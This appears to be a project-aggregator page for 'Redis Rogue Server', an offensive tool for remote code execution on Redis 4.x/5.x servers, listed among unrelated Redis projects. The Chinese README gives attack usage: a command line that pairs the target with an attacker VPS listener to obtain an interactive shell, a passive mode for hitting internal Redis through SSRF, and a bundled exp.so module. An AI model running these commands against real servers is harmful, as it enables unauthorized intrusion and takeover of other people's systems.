Dliv3 / Redis Rogue Server
Redis 4.x/5.x RCE
Stars: ✭ 243
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Redis Rogue Server
Gopherus
This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
Stars: ✭ 1,258 (+417.7%)
Mutual labels: redis, rce
Chameleon
Customizable honeypots for monitoring network traffic, bots activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres and MySQL)
Stars: ✭ 230 (-5.35%)
Mutual labels: redis
Spring Boot Start Current
Spring Boot 脚手架 Mybatis Spring Security JWT 权限 Spring Cache + Redis
Stars: ✭ 246 (+1.23%)
Mutual labels: redis
Redis Smq
A simple high-performance Redis message queue for Node.js.
Stars: ✭ 230 (-5.35%)
Mutual labels: redis
Ecommerce website development
本项目基于Django1.8.2等来开发一个电商平台,可实现注册、登录、浏览、购买、支付等全部常用功能。
Stars: ✭ 246 (+1.23%)
Mutual labels: redis
Kue Scheduler
A job scheduler utility for kue, backed by redis and built for node.js
Stars: ✭ 240 (-1.23%)
Mutual labels: redis
Golang Url Shortener
URL Shortener written in Golang using Bolt DB or Redis. Provides features such as Deletion, Expiration, OAuth and is of course Dockerizable.
Stars: ✭ 240 (-1.23%)
Mutual labels: redis
Redis Manager
Integrates your Laravel application with a redis manager
Stars: ✭ 245 (+0.82%)
Mutual labels: redis
Redis Windows
Vagrant redis configuration and the binary releases of MS Open Tech redis port of windows
Stars: ✭ 2,596 (+968.31%)
Mutual labels: redis
Cqrs Clean Eventual Consistency
CQRS, using Clean Architecture, multiple databases and Eventual Consistency
Stars: ✭ 247 (+1.65%)
Mutual labels: redis
Video Chat
Video chat app using Vue, Vuex, WebRTC, SocketIO, Node, Redis & Docker with horizontal scaling. Multiparty and 1 to 1 video functionality, several public rooms and user status
Stars: ✭ 240 (-1.23%)
Mutual labels: redis
Rusty Celery
🦀 Rust implementation of Celery for producing and consuming background tasks
Stars: ✭ 243 (+0%)
Mutual labels: redis
Redis Rogue Server
Redis 4.x/Redis 5.x RCE利用脚本, 涉及技术点可参考 Redis post-exploitation.
经测试Redis 5.0.8也可以使用,没有出现ppt上写的5.0无法set/get config的情况.
Usage
编译.so模块, 代码: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.
将.so与 redis-rogue-server.py
放置在同一目录下
项目自带了一个编译好的的exp.so文件, 可直接使用
主动连接模式
适用于目标Redis服务处于外网的情况
- 外网Redis未授权访问
- 已知外网Redis口令
启动redis rogue server,并主动连接目标redis服务发起攻击
python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>
参数说明:
-
--rpasswd
如果目标Redis服务开启了认证功能,可以通过该选项指定密码 -
--rhost
目标redis服务IP -
--rport
目标redis服务端口,默认为6379 -
--lhost
vps的外网IP地址 -
--lport
vps监控的端口,默认为21000
攻击成功之后,你会得到一个交互式shell
被动连接模式
适用于目标Redis服务处于内网的情况
- 通过SSRF攻击Redis
- 内网Redis未授权访问/已知Redis口令, Redis需要反向连接redis rogue server
这种情况下可以使用--server-only
选项
python3 redis-rogue-server.py --server-only
参数说明:
-
--server-only
仅启动redis rogue server, 接受目标redis的连接,不主动发起连接
Copyright
本项目为n0b0dyCN同名项目的fork, 在原项目代码基础之上修复了一些bug, 添加了一些新功能, 并针对不同漏洞利用场景做了一些优化。
因原作者删掉了原始repo, 所以直接挂到了我下面。
404StarLink 2.0 - Galaxy
Redis Rogue Server 是 404Team 星链计划2.0中的一环,如果对Redis Rogue Server有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].